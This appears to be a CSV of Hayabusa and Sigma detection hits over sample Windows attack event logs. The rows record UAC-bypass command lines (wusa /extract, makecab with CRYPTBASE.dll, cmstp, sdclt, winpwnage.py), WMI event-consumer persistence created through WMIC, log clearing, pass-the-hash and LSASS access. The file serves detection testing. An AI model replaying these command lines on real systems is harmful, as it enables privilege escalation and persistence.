2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc""  :  Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /priv  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe""   :  Path: C:\Windows\System32\cliconfg.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe""   :  Path: C:\Windows\ehome\Mcx2Prov.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab  :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x1bbdce  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini  :  Path: C:\Windows\System32\cmstp.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""'  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: python  winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
